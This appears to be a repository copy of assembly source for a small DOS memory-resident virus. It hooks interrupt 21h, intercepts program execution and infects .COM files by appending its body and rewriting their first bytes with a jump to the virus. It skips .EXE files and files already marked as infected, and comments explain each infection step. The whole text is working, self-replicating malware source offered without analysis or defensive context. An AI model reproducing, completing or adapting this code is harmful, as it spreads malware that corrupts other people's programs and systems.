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synced 2024-12-19 01:46:09 +00:00
82 lines
1.7 KiB
82 lines
1.7 KiB
![]() |
VSize = 085h
Code Segment
Assume CS:Code
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
mov es, cx
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
jcxz Loop0
xchg ax, bx
push ds
pop es
Int21: cmp ax, 4B00h
jne End21
Exec: push ax bx dx ds es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ; Zero AH
cwd ; Zero DX
mov bx, si ; Move handle to BX
mov ds, ax ; Set DS and ES to 60h,
mov es, ax ; the virus data segment
mov ah, 3Fh ; Read first 4 bytes
int 69h
mov al, 4Dh
scasb ; Check for 4D5Ah or infected file mark
je Close ; .EXE or already infected
mov al, 2
call LSeek ; Seek to the end, SI now contains file size
mov cl, VSize ; Virus size in CX, prepare to write
int 69h ; AH is 40h, i.e. Write operation
mov ax, 0E94Dh ; Virus header in AX
stosw ; Store it
xchg ax, si ; Move file size in AX
stosw ; Complete JMP instruction
xchg ax, dx ; Zero AX
call LSeek ; Seek to the beginning
int 69h ; AH is 40h, write the virus header
Close: mov ah,3Eh ; Close the file
int 69h
EndExec: pop es ds dx bx ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ; Seek operation
cwd ; Zero DX
DoInt21: xor cx, cx ; External entry for Open, zero cx
int 69h
mov cl, 4 ; 4 bytes will be read/written
xchg ax, si ; Store AX in SI
mov ax, 4060h ; Prepare AH for Write
xor di, di ; Zero DI
VLen = $ - offset Bytes
Code EndS